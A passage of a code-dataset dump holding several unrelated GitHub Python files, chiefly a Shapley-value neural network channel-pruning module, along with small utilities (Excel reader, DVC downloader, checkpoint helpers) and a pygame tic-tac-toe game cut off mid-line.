row in file_data:\n feature_data[row_num] = sum(row[slice_range[0]:slice_range[1]]) / (slice_range[1] - slice_range[0])\n row_num += 1\n self.feature.append(feature_data)\n \n#tsv_file = LoadSensorTsvFile()\n#tsv_file.read_in_files('050801_yangguang')\n#tsv_file.get_feature(tsv_file.slice_avg)\n","repo_name":"nealyang2017/yang20170715","sub_path":"LoadSensorTsvFile.py","file_name":"LoadSensorTsvFile.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17566990529","text":"def even_odd(*args):\n command = args[-1]\n nums = []\n if command=='even':\n for i in args[:-1]:\n if i % 2 == 0:\n nums.append(i)\n return nums\n elif command == 'odd':\n for i in args[:-1]:\n if i % 2 != 0:\n nums.append(i)\n return nums\n\n\nprint(even_odd(1, 2, 3, 4, 5, 6, \"even\"))\nprint(even_odd(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, \"odd\"))","repo_name":"ilias511/Advanced","sub_path":"Functions_Advanced/Even or Odd.py","file_name":"Even or Odd.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"19825449823","text":"import os\n\nfrom dvc.api import DVCFileSystem\n\n\ndef main(config):\n if os.path.isdir(f\"./data/{config.dataset}\"):\n print(f\"The folder \\\"{config.dataset}\\\" exists\")\n else:\n print(\"Dataset download begins\")\n url = \"https://github.com/Natalka-Pro/myops_tools.git\"\n fs = DVCFileSystem(url, rev=\"main\")\n fs.get(\"./data\", \"./\", recursive=True)\n print(\"Dataset download completed\")\n","repo_name":"Natalka-Pro/MYopsTools","sub_path":"myops_tools/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11770180415","text":"\"\"\"\n*****************************************************************************\n Reads an excel file, extracts the information and store them in\n an organized list which contains a tuple of the information in each\n row in our excel file\n*****************************************************************************\n\"\"\"\nimport openpyxl\n\n\nclass ExcelReader:\n \"\"\"Creates a constructor of our class\"\"\"\n def __init__(self, excel_doc):\n self._excel_doc = excel_doc\n self._sheet = None\n\n # Gets the required sheet to extract our data\n def required_sheet(self, active_sheet):\n excel_doc = openpyxl.load_workbook(self._excel_doc)\n r_sheet = excel_doc[active_sheet]\n self._sheet = r_sheet\n\n # Extracts the data store them in a list\n def extract_data_to_list(self):\n # extracts the raw data and keep in a list\n list_data = list()\n for row in self._sheet.iter_rows():\n prime_list = list()\n for cell in row:\n prime_list.append(cell.value)\n list_data.append(prime_list)\n return list_data\n\n # contains the well formatted data in the form a tuple (name, email_address)\n def email_info(self):\n email_info_list = list()\n data = self.extract_data_to_list()\n for i in range(1, len(data)):\n info = [data[i][0], data[i][1]]\n email_info_list.append(tuple(info))\n return email_info_list\n","repo_name":"mofirojean/Emailer_using_python","sub_path":"emailer_excel_reader.py","file_name":"emailer_excel_reader.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"32185486180","text":"import torch\nimport torchvision\n\ndef save_some_examples(gen, val_loader, epoch, device):\n x, y = next(iter(val_loader))\n x, y = x.to(device).squeeze(1), y.to(device).squeeze(1)\n gen.eval()\n with torch.no_grad():\n _, y_fake = gen(x)\n y_fake = y_fake * 0.5 + 0.5 # remove normalization\n torchvision.utils.save_image(y_fake, f\"/y_gen_{epoch}.png\")\n torchvision.utils.save_image(x * 0.5 + 0.5, f\"/input_{epoch}.png\")\n if epoch == 1:\n torchvision.utils.save_image(y, f\"/label_{epoch}.jpg\")\n gen.train()\n\ndef save_checkpoint(model, optimizer, filename=\"my_ckpt.pth\"):\n print(\"=> saving checkpoint...\")\n checkpoint = {\n \"state_dict\": model.state_dict(),\n \"optimizer\": optimizer.state_dict(),\n }\n torch.save(checkpoint, filename)\n\ndef load_checkpoint(checkpoint_file, model, optimizer, lr, device):\n print(\"=> loading checkpoint...\")\n checkpoint = torch.load(checkpoint_file, map_location=device)\n model.load_state_dict(checkpoint[\"state_dict\"])\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n\n for param_group in optimizer.param_groups:\n param_group[\"lr\"] = lr\n\n","repo_name":"yotamraz/LootedArt","sub_path":"pix2pix/utils/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19138006949","text":"#from models.lenet5 import Lenet\nimport torch\nimport numpy as np\nfrom itertools import chain, combinations\nimport os\nfrom sklearn.linear_model import LinearRegression\nfrom collections import OrderedDict\nfrom operator import itemgetter\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\ndef oracle(dic, size, nodenum, adding):\n\n #smaller values means this set (which is zeroed out) bring highest loss\n keys = list(dic.keys())\n if adding:\n mm = [i for i in keys if len(i) == nodenum - size]\n else:\n mm = [i for i in keys if len(i) == size]\n\n lal = {k: dic[k] for k in mm}\n d_rev = OrderedDict(sorted(lal.items(), key=itemgetter(1), reverse=True))\n\n d_keys = list(d_rev)\n d_values = list(d_rev.values())\n\n # we take the complement of the set\n # adding. we take biggest\n if adding:\n d_keys_comp =[]\n for key in range(len(d_keys)):\n comp = set(np.arange(nodenum)) - set(d_keys[key])\n d_keys_comp.append(comp)\n\n return d_keys_comp[:5], d_values[:5]\n\n # removing, we take smallest, removing hurts the accuracy\n else: #best to remove\n return d_keys[:5], d_values[:5]\n\n\ndef oracle_get(dic, param, rank):\n # oracle\n print(\"\\nOracle adding\\n\") # adding means its loss is the biggest when removing just one\n good=0; all=0\n for o in range(1, 6):\n # get the best set of size o\n set_oracle, val_oracle = oracle(dic, o, param.shape[0], True)\n print(f\"\\nOracle best to add for {param.shape[0] - o}:\")\n print(set_oracle, val_oracle)\n ora = set(list(set_oracle[:o][0]))\n ran = set(rank[:o])\n inter = ora.intersection(ran)\n good+=len(inter); all+=len(ran)\n print(f\"Acc add: {good/float(all)}\")\n print(\"\\nOracle removing\\n\")\n good = 0; all = 0\n for o in range(1, 6):\n set_oracle, val_oracle = oracle(dic, o, param.shape[0], False)\n print(f\"\\nOracle vest to remove for {o}:\")\n print(set_oracle, val_oracle)\n ora = set(list(set_oracle[:o][0]))\n ran = set(rank[-o:])\n inter = ora.intersection(ran)\n good += len(inter);\n all += len(ran)\n print(f\"Acc remov: {good / float(all)}\")\n\n\ndef shapley_rank(evaluate, net, net_name, checkpoint_name, dataset, file_load, k_num, method, sample_num, adding, layer=\"None\", criterion=\"dummy\", args=None, path=None):\n path_file = \"sv/Lenet/combin\"\n print(\"Computing Shapley rank in two stages\")\n print(f\"Shapley method: {method}\")\n # just to check the original accuracy without any pruning\n if net_name==\"Resnet50\":\n acc = 76.13\n #acc = evaluate(dataset, net, criterion, args) # datset is val_laoder\n elif net_name==\"resnet\": #from grad_drop\n acc = evaluate(net, dataset)\n else:\n acc = evaluate(net, \"test\")\n # compute combinations/ characteristic function\n if path is None:\n path=f\"../methods/sv/{net_name}/{method}\"\n os.makedirs(path, exist_ok=True)\n shap_ranks=[]; shap_ranks_dic = {}\n\n for layer_name, param in net.named_parameters():\n # for a particular layer indicated in args\n if layer != \"None\":\n if layer==layer_name:\n pass\n else:\n continue\n print(layer_name)\n\n if \"weight\" in layer_name and \"bn\" not in layer_name and \"out\" not in layer_name:\n print(\"Lay\")\n #if \"weight\" in layer_name and \"bn\" not in layer_name and \"out\" not in layer_name and \"fc\" in layer_name: #remove after cvpr2022\n if not \"Resnet\" in net_name or (\"Resnet\" in net_name and (\"layer\" in layer_name or \"fc\" in layer_name or layer_name==\"module.conv1.weight\")):\n #if not \"Resnet\" in net_name or (\"Resnet\" in net_name and \"fc\" in layer_name):\n\n print(\"Layer: \", layer_name)\n global file_name, file_name_new, file_name_old\n file_name = f\"{path}/{method}_pruning_{checkpoint_name}_{layer_name}\"\n file_name_new = file_name + \"_new.txt\"\n file_old = file_name + \".txt\"\n file_name_old = file_name + \".txt\"\n if not os.path.isfile(file_name_old):\n with open(file_name_old, \"a+\") as f:\n f.write((str(param.shape[0])+\"\\n\"))\n\n if method == \"kernel\":\n if not file_load: # kernshap writes the results to file\n shap_arr = kernshap(True, net, net_name, layer_name, evaluate, dataset, k_num, param, sample_num, \"zeroing\", args, criterion)\n dic, nodes_num = readdata_notsampled(file_old, acc)\n print(f\"Read from {file_old}\")\n print(f\"Number of samples: {len(dic.keys())}\")\n\n reg = LinearRegression().fit(list(dic.keys())[1:], list(dic.values())[1:])\n shap_arr = reg.coef_\n shap_arr=-1*shap_arr\n print(\"shaps\\n\", shap_arr)\n\n if method == \"random\":\n if not file_load:\n randomshap(True, net, net_name, checkpoint_name, layer_name, evaluate, dataset, k_num, param, sample_num, \"zeroing\")\n shap_arr = readdata_notsampled_random(file_old, acc)\n print(\"shaps\\n\", shap_arr)\n #shap_arr = file_read(\"random\", net_name, checkpoint_name, layer_name)\n\n if method == \"combin\":\n if not file_load:\n compute_combinations_lenet(True, net, net_name, layer_name, evaluate, dataset, k_num, \"zeroing\")\n dic, nodes_num = readdata_notsampled_combin(file_name_new, acc)\n #k_num=1; adding=False\n print(f\"\\nExact partial for {k_num} and adding: {adding}\")\n shap_arr = exact_partial(dic, nodes_num, acc, adding, k_num)\n la=np.argsort(shap_arr)[::-1]\n print(\",\".join(map(str, la)))\n\n shap_rank = np.argsort(shap_arr)[::-1]\n print(shap_rank)\n shap_ranks.append(shap_rank)\n shap_ranks_dic[layer_name]=shap_rank\n\n #get oracle\n file_name = f\"../methods/sv/{net_name}/combin/combin_pruning_{checkpoint_name}_{layer_name}\"\n file_name_new = file_name + \"_new.txt\"\n\n\n # compute the intersection of the rank selected above and the oracle set\n # maybe commented on the server\n if os.path.isfile(file_name_new):\n dic, nodes_num = readdata_notsampled_combin(file_name_new, acc)\n oracle_get(dic, param, shap_rank)\n\n\n return shap_ranks, shap_ranks_dic\n\n\n# def file_read_npy(meth, net_name, checkpoint_name, layer):\n# if meth==\"random\":\n# samples_most=0\n# for fname in os.listdir(f'../methods/sv/{net_name}/{meth}'):\n# core_name = f\"{meth}shap_{checkpoint_name}_{layer}_samp_\"\n# if core_name in fname:\n# samp_num_temp = fname.replace(core_name, \"\")\n# samp_num = samp_num_temp.replace(\".npy\", \"\")\n# samples_num = int(samp_num)\n# if samples_num>samples_most:\n# samples_most = samples_num\n# #loading file\n# path_meth = f\"../methods/sv/{net_name}/{meth}/{meth}shap_{checkpoint_name}_{layer}_samp_{samples_most}.npy\"\n# randsvs = np.load(path_meth)\n# print(f\"Loaded {meth} Shapley file from {path_meth}\")\n# return randsvs\n\n\ndef file_check(method):\n if method==\"combin\":\n # check if new results have more lines than the previous one\n file_old = file_name + \".txt\"\n file_new = file_name + \"_new.txt\"\n if os.path.exists(file_old):\n num_lines_old = sum(1 for line in open(file_old, \"r\"))\n num_lines_new = sum(1 for line in open(file_new, \"r\"))\n # if num_lines_old > num_lines_new:\n # os.remove(file_new)\n # else:\n # os.remove(file_old)\n # os.rename(file_new, file_old)\n else:\n os.rename(file_new, file_old)\n\n\n# taken form ranking/results_compression/lenet_network_pruning_withcombinations.py\ndef compute_combinations_lenet(file_write, net, net_name, layer, evaluate, dataset, k_num, perturbation_method):\n print(\"1. Computing combinations\")\n\n acc = evaluate(net, \"test\")\n print(\"from other\")\n # for name, param in net.named_parameters():\n # print(name)\n for name, param in net.named_parameters():\n print(\"Working on the layer: \", layer)\n # find a layer (weight and bias) where we compute rank\n\n if layer in name:\n if file_write:\n with open(file_name_new, \"a+\") as textfile:\n textfile.write(str(param.shape[0])+\"\\n\")\n if \"Resnet\" not in net_name:\n layerbias = layer[:-6] + \"bias\" #:3 for lenet\n params_bias = net.state_dict()[layerbias]\n all_results = {}\n # get s and r to compute the (s choose r)\n s = torch.arange(0, param.shape[0]) # list from 0 to 19 as these are the indices of the data tensor\n # get the alternating elements in the channel list to have the most combinations from the beginning and end first\n a = np.arange(0, param.shape[0]+1)\n channel_list = [a[-i // 2] if i % 2 else a[i // 2] for i in range(len(a))]\n channel_list=channel_list[:] if k_num==None else channel_list[:k_num]\n #for r in range(1, param.shape[0]): # produces the combinations of the elements in s\n for r in channel_list:\n print(r)\n results = []\n for combination in list(combinations(s, r)):\n combination = torch.LongTensor(combination)\n #print(combination)\n # save current values in a placeholder\n params_saved = param[combination].clone();\n if \"Resnet\" not in net_name:\n param_bias_saved = params_bias[combination].clone()\n # zero out a subset of the channels\n if perturbation_method == \"zeroing\":\n\n\n ## param[combination] = 0\n ## if net_name is not \"Resnet\":\n ## params_bias[combination] = 0\n ## accuracy = evaluate(net, \"val\")\n\n # add noise to subset of channels (experimental feature)\n # elif perturbation_method == \"additive_noise\":\n # # norm_dist=torch.distributions.Normal(0,0.1)\n # # param[combination[0]] += norm_dist.sample(param[combination[0]].shape).to(device)\n # # multiplying by noise\n # # norm_dist = torch.distributions.Normal(1, 0.1)\n # # param[combination[0]] *= norm_dist.sample(param[combination[0]].shape)\n # # adding noise\n # accuracies = []\n # for i in range(5):\n # norm_dist = torch.distributions.Normal(0, 0.1)\n # param[combination[0]] += norm_dist.sample(param[combination[0]].shape)\n # accuracies.append(evaluate())\n # accuracy = np.mean(accuracies)\n # print(\"Averaged accuracy: \", accuracy)\n ########################################333\n # accuracy = evaluate(net)\n\n ##param.data[combination] = params_saved\n ##if net_name is not \"Resnet\":\n ## params_bias.data[combination] = param_bias_saved\n\n accuracy = check_combination(net, net_name, combination, param, evaluate, params_bias)\n\n\n results.append((combination, accuracy))\n # write the combinations to the file\n if file_write:\n with open(file_name_new, \"a+\") as textfile:\n textfile.write(\"%s: %.2f\\n\" % (\",\".join(str(x) for x in combination.numpy()), accuracy))\n\n all_results[r] = results\n file_check(\"combin\")\n\n\ndef exact_partial(dic, nodesNum, original_acc, adding, K_param=0):\n #minus means actually plus because we remove it from the list of 0s, so add to the list of non-zeros\n #dic[tuple(np.arange(nodesNum))] = 10 #random accuracy of no all zeros\n dic[()] = original_acc\n m = list(dic.keys())\n m.sort(key=lambda t: len(t), reverse=True)\n\n shaps = np.zeros(nodesNum)\n shaps_samps = np.zeros(nodesNum)\n N = nodesNum\n for elem in m:\n val1 = dic[elem]\n #print(\"el: \", elem, \"val: \", val1)\n if len(elem) == 1:\n mama = 0\n elem_set = set(elem)\n if adding:\n thresh = (nodesNum - K_param)\n else:\n thresh = K_param\n for i in elem:\n elem_set.remove(i)\n elem_plus = tuple(elem_set)\n K = len(elem_plus)\n if (K>=thresh and adding) or (K+1<=thresh and not adding):\n #if K >1 and tuple(elem_plus) in m:\n if tuple(elem_plus) in m:\n val2 = dic[elem_plus]-val1\n # elif len(elem_plus)==1:\n # val2 = dic[elem_plus]\n #print(print(\"i: \", i, \"val2: \", val2, \"el: \", elem_plus, \"val: \", dic[elem_plus]))\n\n coeff = np.math.factorial(N-K-1)*np.math.factorial(K)\n shaps[i]+=val2*coeff\n shaps_samps[i]+=1\n elem_set.add(i)\n\n svs = np.divide(shaps, np.math.factorial(N))\n print(\"svs\", svs)\n return svs\n\n\n\ndef check_combination(net, net_name, combination, param, evaluate, params_bias, args=None, criterion=None, loader=None):\n combination = torch.LongTensor(combination)\n print(combination)\n params_saved = param[combination].clone()\n if \"Resnet\" not in net_name and \"resnet\" not in net_name:\n param_bias_saved = params_bias[combination].clone()\n\n #param[combination[0]] = 0\n param.data[combination] = 0\n #print(\"Sum:\\n \", torch.sum(param, axis=(1, 2, 3)))\n if \"Resnet\" not in net_name and \"resnet\" not in net_name:\n params_bias[combination] = 0\n\n if net_name is not \"Resnet50\" and \"resnet\" not in net_name: #resnet50\n accuracy = evaluate(net, \"val\")\n elif \"resnet\" in net_name:\n accuracy = evaluate(net, loader)\n else:\n accuracy = evaluate(loader, net, criterion, args)\n\n param.data[combination] = params_saved\n if \"Resnet\" not in net_name and \"resnet\" not in net_name:\n params_bias.data[combination] = param_bias_saved\n\n return accuracy\n\ndef write_file(file_write, comb, acc):\n if file_write:\n with open(file_name_old, \"a+\") as textfile:\n textfile.write(\"%s: %.2f\\n\" % (\",\".join(str(x) for x in comb), acc))\n print(f\"Saved in {file_name_old}\")\n\ndef kernshap(file_write, net, net_name, layer, evaluate, dataset, k_num, param, samples_num=10, perturbation_method=None, args=None, criterion=None):\n\n if \"Resnet\" not in net_name and \"resnet\" not in net_name:\n layerbias = layer[:-6] + \"bias\" #:3 for lenet\n params_bias = net.state_dict()[layerbias]\n else:\n params_bias = None\n\n # if file_write:\n # with open(file_name, \"a+\") as textfile:\n # textfile.write(str(param.shape[0])+\"\\n\")\n\n combinations_bin = np.zeros((samples_num, param.shape[0]))\n accuracies = np.zeros(samples_num)\n for i in range(samples_num):\n print(f\"samp: {i}\")\n randperm = np.random.permutation(param.shape[0])\n randint = 0\n while (randint == 0):\n randint = np.random.randint(param.shape[0])\n randint_indextoremove = np.random.randint(randint)\n combination = randperm[:randint]\n combination2 = np.delete(combination, randint_indextoremove)\n print(combination[randint_indextoremove])\n\n acc = check_combination(net, net_name, combination, param, evaluate, params_bias, args, criterion, dataset)\n\n\n combinations_bin[i, combination] = 1\n accuracies[i]=acc\n\n write_file(file_write, combinations_bin[i], accuracies[i])\n\n #file_check()\n\n dumm=1\n return\n\n\ndef randomshap(file_write, net, net_name, checkpoint_name, layer, evaluate, dataset, k_num, param, samples_num=10,\n perturbation_method=None):\n if \"Resnet\" not in net_name :\n layerbias = layer[:-6] + \"bias\" #:3 for lenet\n params_bias = net.state_dict()[layerbias]\n else:\n params_bias = None\n\n acc_val = evaluate(net, \"val\")\n\n shaps = np.zeros(param.shape[0])\n combinations_bin = np.zeros((samples_num, param.shape[0]))\n accuracies = np.zeros(samples_num)\n for i in range(samples_num):\n print(f\"\\nSample num: {i}\")\n randperm = np.random.permutation(param.shape[0])\n last_acc = acc_val\n nums = []; marginals = [];\n for j in range(param.shape[0]):\n elem = randperm[j]\n print(f\"\\n\\nChannel marginal check: {elem}\")\n combination = randperm[:j+1]\n acc = check_combination(net, net_name, combination, param, evaluate, params_bias)\n marginal = last_acc - acc\n last_acc = acc\n shaps[elem]+= marginal\n\n nums.append(combination); marginals.append(acc)\n for k in range(len(nums)):\n write_file(file_write, nums[k], marginals[k])\n\n if i % 10 == 0 or i==samples_num-1:\n print(shaps)\n randsvs = shaps/(i+1)\n print(randsvs)\n print(np.argsort(randsvs)[::-1])\n #np.save(f\"../methods/sv/{net_name}/random/randomshap_{checkpoint_name}_{layer}_samp_{(i+1)}.npy\", randsvs)\n return randsvs\n\n\n\n# CHOOSES RANDOM COMBINATION and then removed one of the random nodes and computes accuracy for that node\n# from ranking/results_compression/network_pruning_withcombinstions.py\ndef compute_combinations_random(file_write, net, evaluate):\n for name, param in net.named_parameters():\n print(name)\n print(param.shape)\n layer = \"c5.weight\"\n # find a layer (weight and bias) where we compute rank\n\n if layer in name:\n layerbias = layer[:3] + \"bias\"\n params_bias = net.state_dict()[layerbias]\n while (True):\n\n all_results = {}\n # s=torch.range(0,49) #list from 0 to 19 as these are the indices of the data tensor\n # for r in range(1,50): #produces the combinations of the elements in s\n # results=[]\n randperm = np.random.permutation(param.shape[0])\n randint = 0\n while (randint == 0):\n randint = np.random.randint(param.shape[0])\n randint_indextoremove = np.random.randint(randint)\n combination = randperm[:randint]\n combination2 = np.delete(combination, randint_indextoremove)\n print(combination[randint_indextoremove])\n\n if file_write:\n with open(\"results_running/combinations_pruning_mnist_%s_%s.txt\" % (path[7:], layer), \"a+\") as textfile:\n textfile.write(\"%d\\n\" % randint_indextoremove)\n for combination in [combination, combination2]:\n # for combination in list(combinations(s, r)):\n combination = torch.LongTensor(combination)\n print(combination)\n params_saved = param[combination].clone()\n param_bias_saved = params_bias[combination].clone()\n # param[torch.LongTensor([1, 4])] = 0\n # workaround, first using multiple indices does not work, but if one of the change first then it works to use param[combinations]\n if len(combination) != 0:\n param[combination[0]] = 0\n # param[combination]=0\n params_bias[combination] = 0\n accuracy = evaluate()\n param.data[combination] = params_saved\n params_bias.data[combination] = param_bias_saved\n if file_write:\n with open(\"results_running/combinations_pruning_fashionmnist_%s_%s.txt\" % (path[7:], layer),\n \"a+\") as textfile:\n textfile.write(\"%s: %.2f\\n\" % (\",\".join(str(x) for x in combination.numpy()), accuracy))\n\n # all_results[r]=results\n\n # import pickle\n # filename='combinations_all_results_rel_bn_%d.pkl' % r\n # file=open(filename, 'wb')\n # pickle.dump(all_results, file)\n # file.close()\n\n\n#############################################3\n# copied from ranking/results_shapley/shapley.py\n\n# READ ONLY DATA\n# not sampled, we take all the combinations of size 1, then all the combinations of size 2, etc.\n\n# reads into dic 0,6 : 98.51\n# 6: 98.82\n# 7: 98.17\n# 8: 98.57\n# 9: 99.02\n# 0,1: 97.65\n# 0,2: 98.83\n# 0,3: 98.63\n# 0,4: 98.80\n\n\ndef readdata_notsampled_marginals(file, original_accuracy):\n f = open(file)\n dict = {(): 0}\n nodes_num = int(next(f)[:-1]) # number of points, first line of the file only\n shap=np.zeros(nodes_num)\n for i in range(nodes_num):\n dict[i]=[]\n for line in f:\n linesplit = line.strip().split(\":\")\n tup = int(linesplit[0])\n acc = float(linesplit[1])\n #dict[tup] = original_accuracy - acc\n dict[tup].append(acc)\n #print(tup, acc)\n f.close()\n for m in range(nodes_num):\n shap[m]=np.average(dict[m])\n return shap\n\n\ndef readdata_notsampled(file, original_accuracy):\n f = open(file)\n nodes_num = next(f)[:-1] # number of points, first line of the file only\n #line = next(f)\n #linesplit = line.strip().split(\":\")\n #original_accuracy2 = float(linesplit[1])\n dict = {(): original_accuracy}\n for line in f:\n\n\n\n #print(line)\n linesplit = line.strip().split(\":\")\n #try:\n tup = tuple(int(float(i) )for i in linesplit[0].split(\",\"))\n #except:\n # lala=7\n acc = float(linesplit[1])\n #dict[tup] = original_accuracy - acc\n dict[tup]=acc\n #print(tup, acc)\n f.close()\n return dict, int(nodes_num)\n\ndef readdata_notsampled_combin(file, original_accuracy):\n f = open(file)\n nodes_num = next(f)[:-1] # number of points, first line of the file only\n line = next(f)\n linesplit = line.strip().split(\":\")\n original_accuracy2 = float(linesplit[1])\n dict = {(): original_accuracy2}\n for line in f:\n #print(line)\n\n linesplit = line.strip().split(\":\")\n #try:\n tup = tuple(int(float(i) )for i in linesplit[0].split(\",\"))\n #except:\n # lala=7\n acc = float(linesplit[1])\n #dict[tup] = original_accuracy - acc\n dict[tup]=acc\n #print(tup, acc)\n f.close()\n return dict, int(nodes_num)\n\n\ndef get_svs(dict, original_accuracy, nodes_num):\n shaps=np.zeros(nodes_num)\n for key in dict.keys():\n keyl = list(key)\n if len(keyl)==0:\n #shaps[keyl[-1]]=original_accuracy-dict[key]\n old_key_val=dict[key]\n else:\n shaps[keyl[-1]]=old_key_val-dict[key]\n old_key_val=dict[key]\n return shaps\n\n\ndef readdata_notsampled_random(file, original_accuracy):\n f = open(file)\n nodes_num = int(next(f)[:-1]) # number of points, first line of the file only\n #line = next(f)\n #linesplit = line.strip().split(\":\")\n #original_accuracy2 = float(linesplit[1])\n i=0\n dict = {(): original_accuracy}\n shaps=np.zeros(nodes_num)\n samps=0\n for line in f:\n i+=1\n linesplit = line.strip().split(\":\")\n tup = tuple(int(float(i) )for i in linesplit[0].split(\",\"))\n acc = float(linesplit[1])\n #dict[tup] = original_accuracy - acc\n dict[tup]=acc\n #print(tup, acc)\n if i == int(nodes_num):\n i=0\n samps+=1\n # compute the difference in a permuattion from removing more and mroe nodes\n shaps_part = get_svs(dict, original_accuracy, nodes_num)\n shaps+=shaps_part\n dict = {(): original_accuracy}\n\n shaps=shaps/samps\n f.close()\n return shaps\n\n\n#######################\n\n# SHAPLEY VALUE\n\n###########################################################\n# copied from ranking/results_shapley/shapley.py\n\n# sampled shapley, \"full\" perms\n# (in quotes because we may not have computed all the perms, but we compute them sequentially\n# to get all of them, e.g. all perms of size 1, all perms of size 2, etc\n\n# for each node we want to compute Shapley value:\n# we get a random permutation and find that node (we count the subset from the beginning up to that node)\n# remove it and chceck the difference if both the subsets are present\n\n# works on such dics\n# 8: 98.57\n# 9: 99.02\n# 0,1: 97.65\n# 0,2: 98.83\n# 0,3: 98.63\n\ndef shapley_samp(dict_passed, nodesnum, samples_num):\n print(\"Partial Random Shapley\")\n dict = dict_passed\n\n # permutations = list(itertools.permutations(elements))\n shap_array = []\n elements_num = nodesnum\n for elem in range(elements_num): # for each element we want to compute SV of\n sum = 0\n dict_elems = 0\n print(elem)\n for i in range(samples_num):\n perm = np.random.permutation(elements_num).tolist()\n # print(perm)\n # we look at all the permutations\n ind = perm.index(elem)\n del perm[ind + 1:]\n perm.sort()\n perm_tuple = tuple(perm)\n perm.remove(elem)\n removed_perm_tuple = tuple(perm)\n if perm_tuple in dict and removed_perm_tuple in dict:\n val = dict[perm_tuple] - dict[removed_perm_tuple]\n sum += val\n # print(val)\n dict_elems += 1\n # print(\"sum: %.2f, perms: %d\" % (sum,dict_elems))\n shap = sum / dict_elems\n print(\"shap: %.2f\" % shap)\n shap_array.append(shap)\n\n return shap_array\n","repo_name":"kamadforge/dirichlet_pruning","sub_path":"methods/shapley_rank.py","file_name":"shapley_rank.py","file_ext":"py","file_size_in_byte":26665,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"25326682812","text":"import pygame, sys, time, random\r\n\r\npygame.init()\r\nfps = 60\r\nxo = 'x'\r\nwidth = 400\r\nheight = 400\r\ngame_icon = pygame.image.load(\"images/game_icon.png\")\r\npygame.display.set_icon(game_icon)\r\nwinner = None\r\ndraw = False\r\nwhite = (255, 255, 255)\r\nline_color = (0, 0, 0)\r\nclock = pygame.time.Clock()\r\nttt = [[None] * 3, [None] * 3, [None] * 3]\r\nmode = None\r\n\r\npygame.display.set_caption('Tic Tac Toe')\r\nscreen = pygame.display.set_mode((width, height + 100), 0, 32)\r\n\r\nx_img = pygame.image.load('images/x.png')\r\no_img = pygame.image.load('images/o.png')\r\nhome_img = pygame.image.load('images/home.png')\r\nsinglePlayer = pygame.image.load('images/singlePlayer.png')\r\nmultiPlayer = pygame.image.load('images/multiPlayer.png')\r\n\r\nx_img = pygame.transform.scale(x_img, (80, 80))\r\no_img = pygame.transform.scale(o_img, (80, 80))\r\nhome_img = pygame.transform.scale(home_img, (width, height + 100))\r\nsinglePlayer = pygame.transform.scale(singlePlayer, (200, 200))\r\nmultiPlayer = pygame.transform.scale(multiPlayer, (170, 170))\r\n\r\n\r\ndef home_screen():\r\n global mode\r\n\r\n screen.blit(home_img, (0, 0))\r\n pygame.display.update()\r\n time.sleep(1)\r\n screen.fill(white)\r\n pygame.draw.line(screen, line_color, (0, 250), (width, 250), 7)\r\n screen.blit(singlePlayer, (100, 0))\r\n screen.blit(multiPlayer, (100, 300))\r\n pygame.display.update()\r\n\r\n\r\ndef main_screen():\r\n screen.fill(white)\r\n pygame.draw.line(screen, line_color, (width / 3, 0), (width / 3, height), 7)\r\n pygame.draw.line(screen, line_color, (width / 3 * 2, 0), (width / 3 * 2, height), 7)\r\n\r\n pygame.draw.line(screen, line_color, (0, height / 3), (width, height / 3), 7)\r\n pygame.draw.line(screen, line_color, (0, height / 3 * 2), (width, height / 3 * 2), 7)\r\n status()\r\n\r\n\r\ndef status():\r\n global draw\r\n if winner is None:\r\n message = xo.upper() + \"'s Turn\"\r\n else:\r\n message = winner.upper() + \" won !\"\r\n if draw:\r\n message = \"Game drawn !\"\r\n font = pygame.font.Font(None, 30)\r\n text = font.render(message, 1, (255, 255, 255))\r\n screen.fill((0, 0, 0), (0, 400, 500, 100))\r\n text_rect = text.get_rect(center=(width / 2, 500 - 50))\r\n screen.blit(text, text_rect)\r\n pygame.display.update()\r\n\r\n\r\ndef check_win():\r\n global ttt, winner, draw\r\n\r\n for row in range(0, 3):\r\n if ttt[row][0] == ttt[row][1] and ttt[row][1] == ttt[row][2] and ttt[row][0] is not None:\r\n winner = ttt[row][0]\r\n pygame.draw.line(screen, (250, 0, 0), (0, (row + 1) * height / 3 - height / 6), \\\r\n (width, (row + 1) * height / 3 - height / 6), 4)\r\n break\r\n\r\n for col in range(0, 3):\r\n if (ttt[0][col] == ttt[1][col] == ttt[2][col]) and (ttt[0][col] is not None):\r\n # this column won\r\n winner = ttt[0][col]\r\n # draw winning line\r\n pygame.draw.line(screen, (250, 0, 0), ((col + 1) * width / 3 - width / 6, 0), \\\r\n ((col + 1) * width / 3 - width / 6, height), 4)\r\n break\r\n if (ttt[0][0] == ttt[1][1] == ttt[2][2]) and (ttt[0][0] is not None):\r\n # game won diagonally left to right\r\n winner = ttt[0][0]\r\n pygame.draw.line(screen, (250, 70, 70), (50, 50), (350, 350), 4)\r\n if (ttt[0][2] == ttt[1][1] == ttt[2][0]) and (ttt[0][2] is not None):\r\n # game won diagonally right to left\r\n winner = ttt[0][2]\r\n pygame.draw.line(screen, (250, 70, 70), (350, 50), (50, 350), 4)\r\n if all([all(row) for row in ttt]) and winner is None:\r\n draw = True\r\n status()\r\n\r\n\r\ndef reset():\r\n global ttt, winner, draw, xo\r\n time.sleep(3)\r\n xo = 'x'\r\n winner = None\r\n draw = False\r\n home_screen()\r\n ttt = [[None] * 3, [None] * 3, [None] * 3]\r\n\r\n\r\ndef draw_xo(row, col):\r\n global ttt, xo, posx, posy\r\n if row == 1:\r\n posy = 30\r\n if row == 2:\r\n posy = width / 3 + 30\r\n if row == 3:\r\n posy = width / 3 * 2 + 30\r\n if col == 1:\r\n posx = 30\r\n if col == 2:\r\n posx = height / 3 + 30\r\n if col == 3:\r\n posx = height / 3 * 2 + 30\r\n ttt[row - 